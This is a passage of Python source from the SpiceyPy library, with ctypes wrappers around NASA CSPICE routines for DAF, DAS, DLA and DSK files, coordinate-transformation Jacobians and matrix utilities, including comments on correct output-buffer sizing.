    libspice.daffna_c(ctypes.byref(foundflag))
    return bool(foundflag.value)
@spiceErrorCheck
def daffpa():
    """
    Find the previous (backward) array in the current DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/daffpa_c.html

    :return: True if an array was found.
    :rtype: bool
    """
    foundflag = ctypes.c_int()
    libspice.daffpa_c(ctypes.byref(foundflag))
    return bool(foundflag.value)
@spiceErrorCheck
def dafgda(handle, begin, end):
    """
    Read the double precision data bounded by two addresses within a DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgda_c.html

    :param handle: Handle of a DAF.
    :type handle: int
    :param begin: Initial address within file.
    :type begin: int
    :param end: Final address within file.
    :type end: int
    :return: Data contained between begin and end.
    :rtype: Array of floats
    """
    handle = ctypes.c_int(handle)
    # dafgda_c returns the words at addresses begin..end *inclusive*, i.e.
    # end - begin + 1 values (see dafrda below, which sizes its buffer the
    # same way). The previous abs(end - begin) sizing was one element short,
    # letting CSPICE write past the end of the ctypes buffer.
    data = stypes.emptyDoubleVector(1 + end - begin)
    begin = ctypes.c_int(begin)
    end = ctypes.c_int(end)
    libspice.dafgda_c(handle, begin, end, data)
    return stypes.cVectorToPython(data)
@spiceErrorCheck
def dafgh():
    """
    Return (get) the handle of the DAF currently being searched.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgh_c.html

    :return: Handle for current DAF.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.dafgh_c(ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dafgn(lenout=_default_len_out):
    """
    Return (get) the name for the current array in the current DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgn_c.html

    :param lenout: Length of array name string.
    :type lenout: int
    :return: Name of current array.
    :rtype: str
    """
    lenout = ctypes.c_int(lenout)
    # stringToCharP accepts a c_int and allocates a buffer of that length.
    namebuf = stypes.stringToCharP(lenout)
    libspice.dafgn_c(lenout, namebuf)
    return stypes.toPythonString(namebuf)
@spiceErrorCheck
def dafgs(n=125):
    # The 125 may be a hard set,
    # I got strange errors that occasionally happened without it
    """
    Return (get) the summary for the current array in the current DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgs_c.html

    :param n: Optional length N for result Array.
    :return: Summary for current array.
    :rtype: Array of floats
    """
    # Always hand CSPICE the full 125-element buffer regardless of n; only
    # the first n entries are sliced out for the caller below.
    retarray = stypes.emptyDoubleVector(125)
    # libspice.dafgs_c(ctypes.cast(retarray, ctypes.POINTER(ctypes.c_double)))
    libspice.dafgs_c(retarray)
    return stypes.cVectorToPython(retarray)[0:n]
@spiceErrorCheck
@spiceFoundExceptionThrower
def dafgsr(handle, recno, begin, end):
    """
    Read a portion of the contents of (words in) a summary record in a DAF file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafgsr_c.html

    :param handle: Handle of DAF.
    :type handle: int
    :param recno: Record number; word indices are 1-based, 1 to 128 inclusive.
    :type recno: int
    :param begin: Index of first word to read from record, will be clamped > 0.
    :type begin: int
    :param end: Index of last word to read, wll be clamped < 129
    :type end: int
    :return: Contents of request sub-record
    :rtype: float numpy.ndarray
    """
    handle = ctypes.c_int(handle)
    recno = ctypes.c_int(recno)
    begin = ctypes.c_int(begin)
    end = ctypes.c_int(end)
    # dafgsr_c will retrieve no more than 128 words
    # Size the buffer from the clamped, inclusive index range so out-of-range
    # begin/end values cannot over-allocate or overflow the output vector.
    data = stypes.emptyDoubleVector(1 + min([128,end.value]) - max([begin.value,1]))
    found = ctypes.c_int()
    libspice.dafgsr_c(handle, recno, begin, end, data, ctypes.byref(found))
    # found is unwrapped by the @spiceFoundExceptionThrower decorator.
    return stypes.cVectorToPython(data), bool(found.value)
@spiceErrorCheck
def dafopr(fname):
    """
    Open a DAF for subsequent read requests.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafopr_c.html

    :param fname: Name of DAF to be opened.
    :type fname: str
    :return: Handle assigned to DAF.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.dafopr_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dafopw(fname):
    """
    Open a DAF for subsequent write requests.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafopw_c.html

    :param fname: Name of DAF to be opened.
    :type fname: str
    :return: Handle assigned to DAF.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.dafopw_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dafps(nd, ni, dc, ic):
    """
    Pack (assemble) an array summary from its double precision and
    integer components.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafps_c.html

    :param nd: Number of double precision components.
    :type nd: int
    :param ni: Number of integer components.
    :type ni: int
    :param dc: Double precision components.
    :type dc: Array of floats
    :param ic: Integer components.
    :type ic: Array of ints
    :return: Array summary.
    :rtype: Array of floats
    """
    # Size the packed-summary buffer before nd/ni are marshalled to c_int.
    outsum = stypes.emptyDoubleVector(nd + ni)
    libspice.dafps_c(ctypes.c_int(nd), ctypes.c_int(ni),
                     stypes.toDoubleVector(dc), stypes.toIntVector(ic),
                     outsum)
    return stypes.cVectorToPython(outsum)
@spiceErrorCheck
def dafrda(handle, begin, end):
    """
    Read the double precision data bounded by two addresses within a DAF.

    Deprecated: This routine has been superseded by :func:`dafgda` and
    :func:`dafgsr`. This routine is supported for purposes of backward
    compatibility only.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrda_c.html

    :param handle: Handle of a DAF.
    :type handle: int
    :param begin: Initial address within file.
    :type begin: int
    :param end: Final address within file.
    :type end: int
    :return: Data contained between begin and end.
    :rtype: Array of floats
    """
    # Addresses are inclusive, hence end - begin + 1 output words.
    data = stypes.emptyDoubleVector(end - begin + 1)
    libspice.dafrda_c(ctypes.c_int(handle), ctypes.c_int(begin),
                      ctypes.c_int(end), data)
    return stypes.cVectorToPython(data)
@spiceErrorCheck
def dafrfr(handle, lenout=_default_len_out):
    """
    Read the contents of the file record of a DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrfr_c.html

    :param handle: Handle of an open DAF file.
    :type handle: int
    :param lenout: Available room in the output string
    :type lenout: int
    :return:
            Number of double precision components in summaries,
            Number of integer components in summaries,
            Internal file name, Forward list pointer,
            Backward list pointer, Free address pointer.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    lenout = ctypes.c_int(lenout)
    nd = ctypes.c_int()
    ni = ctypes.c_int()
    # Output buffer for the internal file name, sized by lenout.
    ifname = stypes.stringToCharP(lenout)
    fward = ctypes.c_int()
    bward = ctypes.c_int()
    free = ctypes.c_int()
    libspice.dafrfr_c(handle, lenout, ctypes.byref(nd), ctypes.byref(ni),
                      ifname, ctypes.byref(fward), ctypes.byref(bward),
                      ctypes.byref(free))
    return nd.value, ni.value, stypes.toPythonString(
            ifname), fward.value, bward.value, free.value
@spiceErrorCheck
def dafrs(insum):
    """
    Change the summary for the current array in the current DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafrs_c.html

    :param insum: New summary for current array.
    :type insum: Array of floats
    """
    summary = stypes.toDoubleVector(insum)
    libspice.dafrs_c(ctypes.byref(summary))
@spiceErrorCheck
def dafus(insum, nd, ni):
    """
    Unpack an array summary into its double precision and integer components.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafus_c.html

    :param insum: Array summary.
    :type insum: Array of floats
    :param nd: Number of double precision components.
    :type nd: int
    :param ni: Number of integer components.
    :type ni: int
    :return: Double precision components, Integer components.
    :rtype: tuple
    """
    # Output buffers are sized while nd/ni are still plain ints.
    dc = stypes.emptyDoubleVector(nd)
    ic = stypes.emptyIntVector(ni)
    libspice.dafus_c(stypes.toDoubleVector(insum), ctypes.c_int(nd),
                     ctypes.c_int(ni), dc, ic)
    return stypes.cVectorToPython(dc), stypes.cVectorToPython(ic)
@spiceErrorCheck
def dasac(handle, buffer):
    """
    Add comments from a buffer of character strings to the comment
    area of a binary DAS file, appending them to any comments which
    are already present in the file's comment area.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasac_c.html

    :param handle: DAS handle of a file opened with write access.
    :type handle: int
    :param buffer: Buffer of lines to be put into the comment area.
    :type buffer: Array of strs
    """
    n = ctypes.c_int(len(buffer))
    # Width of the longest line plus room for the NUL terminator.
    buflen = ctypes.c_int(len(max(buffer, key=len)) + 1)
    cbuffer = stypes.listToCharArrayPtr(buffer)
    libspice.dasac_c(ctypes.c_int(handle), n, buflen, cbuffer)
@spiceErrorCheck
def dascls(handle):
    """
    Close a DAS file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dascls_c.html

    :param handle: Handle of an open DAS file.
    :type handle: int
    """
    libspice.dascls_c(ctypes.c_int(handle))
@spiceErrorCheck
def dasdc(handle):
    """
    Delete the entire comment area of a previously opened binary
    DAS file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasdc_c.html

    :param handle: The handle of a binary DAS file opened for writing.
    :type handle: int
    """
    libspice.dasdc_c(ctypes.c_int(handle))
@spiceErrorCheck
def dasec(handle, bufsiz=_default_len_out, buflen=_default_len_out):
    """
    Extract comments from the comment area of a binary DAS file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasec_c.html

    :param handle: Handle of binary DAS file open with read access.
    :type handle: int
    :param bufsiz: Maximum size, in lines, of buffer.
    :type bufsiz: int
    :param buflen: Line length associated with buffer.
    :type buflen: int
    :return:
            Number of comments extracted from the DAS file,
            Buffer in which extracted comments are placed,
            Indicates whether all comments have been extracted.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    # Allocate the character buffer while buflen/bufsiz are plain ints.
    buffer = stypes.emptyCharArray(buflen, bufsiz)
    bufsiz = ctypes.c_int(bufsiz)
    buflen = ctypes.c_int(buflen)
    n = ctypes.c_int(0)
    done = ctypes.c_int()
    libspice.dasec_c(handle, bufsiz, buflen, ctypes.byref(n),
                     ctypes.byref(buffer), ctypes.byref(done))
    # Consistency fix: return the SPICE boolean flag as a Python bool, as
    # the parallel DAF routine dafec already does (bool is still an int
    # subclass, so existing truthiness/arithmetic uses keep working).
    return n.value, stypes.cVectorToPython(buffer), bool(done.value)
@spiceErrorCheck
def dashfn(handle, lenout=_default_len_out):
    """
    Return the name of the DAS file associated with a handle.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dashfn_c.html

    :param handle: Handle of a DAS file.
    :type handle: int
    :param lenout: Length of output file name string.
    :type lenout: int
    :return: Corresponding file name.
    :rtype: str
    """
    fname = stypes.stringToCharP(lenout)
    libspice.dashfn_c(ctypes.c_int(handle), ctypes.c_int(lenout), fname)
    return stypes.toPythonString(fname)
@spiceErrorCheck
def dasonw(fname, ftype, ifname, ncomch):
    """
    Internal undocumented command for creating a new DAS file.

    Calls the Fortran entry point ``dasonw_`` directly; the three trailing
    integer arguments are the hidden Fortran string-length parameters for
    fname, ftype and ifname, and must stay in that order.

    :param fname: filename
    :type fname: str
    :param ftype: type
    :type ftype: str
    :param ifname: internal file name
    :type ifname: str
    :param ncomch: amount of comment area
    :type ncomch: int
    :return: Handle to new DAS file
    :rtype: int
    """
    # Capture the Python string lengths before the names are rebound to
    # char pointers below.
    fnamelen = ctypes.c_int(len(fname))
    ftypelen = ctypes.c_int(len(ftype))
    ifnamelen = ctypes.c_int(len(ifname))
    ncomch = ctypes.c_int(ncomch)
    handle = ctypes.c_int()
    fname = stypes.stringToCharP(fname)
    ftype = stypes.stringToCharP(ftype)
    ifname = stypes.stringToCharP(ifname)
    # Fortran calling convention: scalars passed by reference.
    libspice.dasonw_(fname, ftype, ifname, ctypes.byref(ncomch), ctypes.byref(handle), fnamelen, ftypelen, ifnamelen)
    return handle.value
@spiceErrorCheck
def dasopr(fname):
    """
    Open a DAS file for reading.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasopr_c.html

    :param fname: Name of a DAS file to be opened.
    :type fname: str
    :return: Handle assigned to the opened DAS file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.dasopr_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dasopw(fname):
    """
    Open a DAS file for writing.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasopw_c.html

    :param fname: Name of a DAS file to be opened.
    :type fname: str
    :return: Handle assigned to the opened DAS file.
    """
    handle = ctypes.c_int(0)
    libspice.dasopw_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def dasrfr(handle, lenout=_default_len_out):
    """
    Return the contents of the file record of a specified DAS file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dasrfr_c.html

    :param handle: DAS file handle.
    :type handle: int
    :param lenout: length of output strs
    :type lenout: str
    :return: ID word, DAS internal file name, Number of reserved records in file, \
    Number of characters in use in reserved rec. area, Number of comment records in file, \
    Number of characters in use in comment area.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    # Both output strings share the same caller-supplied length.
    idwlen = ctypes.c_int(lenout)  # intentional
    ifnlen = ctypes.c_int(lenout)  # intentional
    idword = stypes.stringToCharP(lenout)
    ifname = stypes.stringToCharP(lenout)
    nresvr = ctypes.c_int(0)
    nresvc = ctypes.c_int(0)
    ncomr = ctypes.c_int(0)
    ncomc = ctypes.c_int(0)
    libspice.dasrfr_c(handle, idwlen, ifnlen, idword, ifname,
                      ctypes.byref(nresvr), ctypes.byref(nresvc),
                      ctypes.byref(ncomr), ctypes.byref(ncomc))
    return stypes.toPythonString(idword), stypes.toPythonString(ifname), nresvr.value, nresvc.value, ncomr.value, ncomc.value
@spiceErrorCheck
def dcyldr(x, y, z):
    """
    Compute the Jacobian of the transformation from rectangular to
    cylindrical coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dcyldr_c.html

    :param x: X-coordinate of point.
    :type x: float
    :param y: Y-coordinate of point.
    :type y: float
    :param z: Z-coordinate of point.
    :type z: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.dcyldr_c(ctypes.c_double(x), ctypes.c_double(y),
                      ctypes.c_double(z), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def deltet(epoch, eptype):
    """
    Return the value of Delta ET (ET-UTC) for an input epoch.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/deltet_c.html

    :param epoch: Input epoch (seconds past J2000).
    :type epoch: float
    :param eptype: Type of input epoch ("UTC" or "ET").
    :type eptype: str
    :return: Delta ET (ET-UTC) at input epoch.
    :rtype: float
    """
    delta = ctypes.c_double()
    libspice.deltet_c(ctypes.c_double(epoch), stypes.stringToCharP(eptype),
                      ctypes.byref(delta))
    return delta.value
@spiceErrorCheck
def det(m1):
    """
    Compute the determinant of a double precision 3x3 matrix.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/det_c.html

    :param m1: Matrix whose determinant is to be found.
    :type m1: 3x3-Element Array of floats
    :return: The determinant of the matrix.
    :rtype: float
    """
    # det_c returns the value directly rather than via an output argument.
    return libspice.det_c(stypes.toDoubleMatrix(m1))
@spiceErrorCheck
def dgeodr(x, y, z, re, f):
    """
    Compute the Jacobian of the transformation from rectangular to
    geodetic coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dgeodr_c.html

    :param x: X-coordinate of point.
    :type x: float
    :param y: Y-coordinate of point.
    :type y: float
    :param z: Z-coord
    :type z: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.dgeodr_c(ctypes.c_double(x), ctypes.c_double(y),
                      ctypes.c_double(z), ctypes.c_double(re),
                      ctypes.c_double(f), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def diags2(symmat):
    """
    Diagonalize a symmetric 2x2 matrix.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/diags2_c.html

    :param symmat: A symmetric 2x2 matrix.
    :type symmat: 2x2-Element Array of floats
    :return:
            A diagonal matrix similar to symmat,
            A rotation used as the similarity transformation.
    :rtype: tuple
    """
    inmat = stypes.toDoubleMatrix(symmat)
    diag = stypes.emptyDoubleMatrix(x=2, y=2)
    rotation = stypes.emptyDoubleMatrix(x=2, y=2)
    libspice.diags2_c(inmat, diag, rotation)
    return stypes.cMatrixToNumpy(diag), stypes.cMatrixToNumpy(rotation)
@spiceErrorCheck
def diff(a, b):
    """
    Take the difference of two sets of any data type to form a third set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/diff_c.html

    :param a: First input set.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Second input set.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Difference of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == b.dtype
    # Fix: compare dtype with == rather than "is". Identity tests against
    # int literals only work because CPython caches small ints, and they
    # emit SyntaxWarning on Python >= 3.8.
    if a.dtype == 0:
        c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
    elif a.dtype == 1:
        c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
    elif a.dtype == 2:
        c = stypes.SPICEINT_CELL(max(a.size, b.size))
    else:
        raise NotImplementedError
    libspice.diff_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlabbs(handle):
    """
    Begin a backward segment search in a DLA file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlabbs_c.html

    :param handle: Handle of open DLA file.
    :type handle: int
    :return: Descriptor of last segment in DLA file
    :rtype: spiceypy.utils.support_types.SpiceDLADescr
    """
    descr = stypes.SpiceDLADescr()
    found = ctypes.c_int()
    libspice.dlabbs_c(ctypes.c_int(handle), ctypes.byref(descr),
                      ctypes.byref(found))
    # The found flag is consumed by @spiceFoundExceptionThrower.
    return descr, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlabfs(handle):
    """
    Begin a forward segment search in a DLA file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlabfs_c.html

    :param handle: Handle of open DLA file.
    :type handle: int
    :return: Descriptor of next segment in DLA file
    :rtype: spiceypy.utils.support_types.SpiceDLADescr
    """
    descr = stypes.SpiceDLADescr()
    found = ctypes.c_int()
    libspice.dlabfs_c(ctypes.c_int(handle), ctypes.byref(descr),
                      ctypes.byref(found))
    # The found flag is consumed by @spiceFoundExceptionThrower.
    return descr, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlafns(handle, descr):
    """
    Find the segment following a specified segment in a DLA file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlafns_c.html

    :param handle: Handle of open DLA file.
    :type handle: c_int
    :param descr: Descriptor of a DLA segment.
    :type descr: spiceypy.utils.support_types.SpiceDLADescr
    :return: Descriptor of next segment in DLA file
    :rtype: spiceypy.utils.support_types.SpiceDLADescr
    """
    assert isinstance(descr, stypes.SpiceDLADescr)
    nextdescr = stypes.SpiceDLADescr()
    found = ctypes.c_int()
    libspice.dlafns_c(ctypes.c_int(handle), ctypes.byref(descr),
                      ctypes.byref(nextdescr), ctypes.byref(found))
    return nextdescr, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlafps(handle, descr):
    """
    Find the segment preceding a specified segment in a DLA file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlafps_c.html

    :param handle: Handle of open DLA file.
    :type handle: c_int
    :param descr: Descriptor of a segment in DLA file.
    :type descr: spiceypy.utils.support_types.SpiceDLADescr
    :return: Descriptor of previous segment in DLA file
    :rtype: spiceypy.utils.support_types.SpiceDLADescr
    """
    assert isinstance(descr, stypes.SpiceDLADescr)
    prevdescr = stypes.SpiceDLADescr()
    found = ctypes.c_int()
    libspice.dlafps_c(ctypes.c_int(handle), ctypes.byref(descr),
                      ctypes.byref(prevdescr), ctypes.byref(found))
    return prevdescr, bool(found.value)
@spiceErrorCheck
def dlatdr(x, y, z):
    """
    Compute the Jacobian of the transformation from rectangular to
    latitudinal coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlatdr_c.html

    :param x: X-coordinate of point.
    :type x: float
    :param y: Y-coordinate of point.
    :type y: float
    :param z: Z-coord
    :type z: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.dlatdr_c(ctypes.c_double(x), ctypes.c_double(y),
                      ctypes.c_double(z), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dp2hx(number, lenout=_default_len_out):
    """
    Convert a double precision number to an equivalent character
    string using base 16 "scientific notation."

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dp2hx_c.html

    :param number: D.p. number to be converted.
    :type number: float
    :param lenout: Available space for output string.
    :type lenout: int
    :return: Equivalent character string, left justified.
    :rtype: str
    """
    lenout = ctypes.c_int(lenout)
    hexstr = stypes.stringToCharP(lenout)
    # CSPICE also reports the output length; it is not exposed to callers.
    hexlen = ctypes.c_int()
    libspice.dp2hx_c(ctypes.c_double(number), lenout, hexstr,
                     ctypes.byref(hexlen))
    return stypes.toPythonString(hexstr)
@spiceErrorCheck
def dpgrdr(body, x, y, z, re, f):
    """
    Compute the Jacobian matrix of the transformation from rectangular
    to planetographic coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpgrdr_c.html

    :param body: Body with which coordinate system is associated.
    :type body: str
    :param x: X-coordinate of point.
    :type x: float
    :param y: Y-coordinate of point.
    :type y: float
    :param z: Z-coordinate of point.
    :type z: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.dpgrdr_c(stypes.stringToCharP(body), ctypes.c_double(x),
                      ctypes.c_double(y), ctypes.c_double(z),
                      ctypes.c_double(re), ctypes.c_double(f), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dpmax():
    """
    Return the value of the largest (positive) number representable
    in a double precision variable.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpmax_c.html

    :return:
            The largest (positive) number representable
            in a double precision variable.
    :rtype: float
    """
    # Direct pass-through; dpmax_c takes no arguments and returns a double.
    return libspice.dpmax_c()
@spiceErrorCheck
def dpmin():
    """
    Return the value of the smallest (negative) number representable
    in a double precision variable.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpmin_c.html

    :return:
            The smallest (negative) number that can be represented
            in a double precision variable.
    :rtype: float
    """
    # Direct pass-through; dpmin_c takes no arguments and returns a double.
    return libspice.dpmin_c()
@spiceErrorCheck
def dpr():
    """
    Return the number of degrees per radian.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpr_c.html

    :return: The number of degrees per radian.
    :rtype: float
    """
    # Direct pass-through; dpr_c is a pure constant function.
    return libspice.dpr_c()
@spiceErrorCheck
def drdcyl(r, lon, z):
    """
    Compute the Jacobian of the transformation from cylindrical to
    rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdcyl_c.html

    :param r: Distance of a point from the origin.
    :type r: float
    :param lon: Angle of the point from the xz plane in radians.
    :type lon: float
    :param z: Height of the point above the xy plane.
    :type z: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.drdcyl_c(ctypes.c_double(r), ctypes.c_double(lon),
                      ctypes.c_double(z), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdgeo(lon, lat, alt, re, f):
    """
    Compute the Jacobian of the transformation from geodetic to
    rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdgeo_c.html

    :param lon: Geodetic longitude of point (radians).
    :type lon: float
    :param lat: Geodetic latitude of point (radians).
    :type lat: float
    :param alt: Altitude of point above the reference spheroid.
    :type alt: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.drdgeo_c(ctypes.c_double(lon), ctypes.c_double(lat),
                      ctypes.c_double(alt), ctypes.c_double(re),
                      ctypes.c_double(f), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdlat(r, lon, lat):
    """
    Compute the Jacobian of the transformation from latitudinal to
    rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdlat_c.html

    :param r: Distance of a point from the origin.
    :type r: float
    :param lon: Angle of the point from the XZ plane in radians.
    :type lon: float
    :param lat: Angle of the point from the XY plane in radians.
    :type lat: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.drdlat_c(ctypes.c_double(r), ctypes.c_double(lon),
                      ctypes.c_double(lat), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdpgr(body, lon, lat, alt, re, f):
    """
    Compute the Jacobian matrix of the transformation from
    planetographic to rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdpgr_c.html

    :param body: Body with which coordinate system is associated.
    :type body: str
    :param lon: Planetographic longitude of a point (radians).
    :type lon: float
    :param lat: Planetographic latitude of a point (radians).
    :type lat: float
    :param alt: Altitude of a point above reference spheroid.
    :type alt: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.drdpgr_c(stypes.stringToCharP(body), ctypes.c_double(lon),
                      ctypes.c_double(lat), ctypes.c_double(alt),
                      ctypes.c_double(re), ctypes.c_double(f), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdsph(r, colat, lon):
    """
    Compute the Jacobian of the transformation from spherical to
    rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdsph_c.html

    :param r: Distance of a point from the origin.
    :type r: float
    :param colat: Angle of the point from the positive z-axis.
    :type colat: float
    :param lon: Angle of the point from the xy plane.
    :type lon: float
    :return: Matrix of partial derivatives.
    :rtype: 3x3-Element Array of floats
    """
    jacobi = stypes.emptyDoubleMatrix()
    libspice.drdsph_c(ctypes.c_double(r), ctypes.c_double(colat),
                      ctypes.c_double(lon), jacobi)
    return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dskb02(handle, dladsc):
    """
    Return bookkeeping data from a DSK type 2 segment.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskb02_c.html

    :param handle: DSK file handle
    :type handle: int
    :param dladsc: DLA descriptor
    :type dladsc: spiceypy.utils.support_types.SpiceDLADescr
    :return: bookkeeping data from a DSK type 2 segment
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    # Output slots: vertex count, plate count, total voxel count, vertex
    # bounds (3x2), voxel size, voxel grid origin, voxel grid extent,
    # coarse-grid scale, and the three pointer-list sizes.
    nv = ctypes.c_int(0)
    np = ctypes.c_int(0)
    nvxtot = ctypes.c_int(0)
    vtxbds = stypes.emptyDoubleMatrix(3, 2)
    voxsiz = ctypes.c_double(0.0)
    voxori = stypes.emptyDoubleVector(3)
    vgrext = stypes.emptyIntVector(3)
    cgscal = ctypes.c_int(0)
    vtxnpl = ctypes.c_int(0)
    voxnpt = ctypes.c_int(0)
    voxnpl = ctypes.c_int(0)
    # dladsc is passed through as-is (by value) to the CSPICE prototype.
    libspice.dskb02_c(handle, dladsc, ctypes.byref(nv), ctypes.byref(np), ctypes.byref(nvxtot), vtxbds, ctypes.byref(voxsiz), voxori, vgrext, ctypes.byref(cgscal), ctypes.byref(vtxnpl), ctypes.byref(voxnpt), ctypes.byref(voxnpl))
    return nv.value, np.value, nvxtot.value, stypes.cMatrixToNumpy(vtxbds), voxsiz.value, stypes.cVectorToPython(voxori), stypes.cVectorToPython(vgrext), cgscal.value, vtxnpl.value, voxnpt.value, voxnpl.value
@spiceErrorCheck
def dskcls(handle, optmiz=False):
    """
    Close a DSK file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskcls_c.html

    :param handle: Handle assigned to the opened DSK file.
    :type handle: int
    :param optmiz: Flag indicating whether to segregate the DSK.
    :type optmiz: bool
    :return:
    """
    # The bool flag is marshalled as a SPICE boolean (c_int).
    libspice.dskcls_c(ctypes.c_int(handle), ctypes.c_int(optmiz))
@spiceErrorCheck
def dskd02(handle, dladsc, item, start, room):
    """
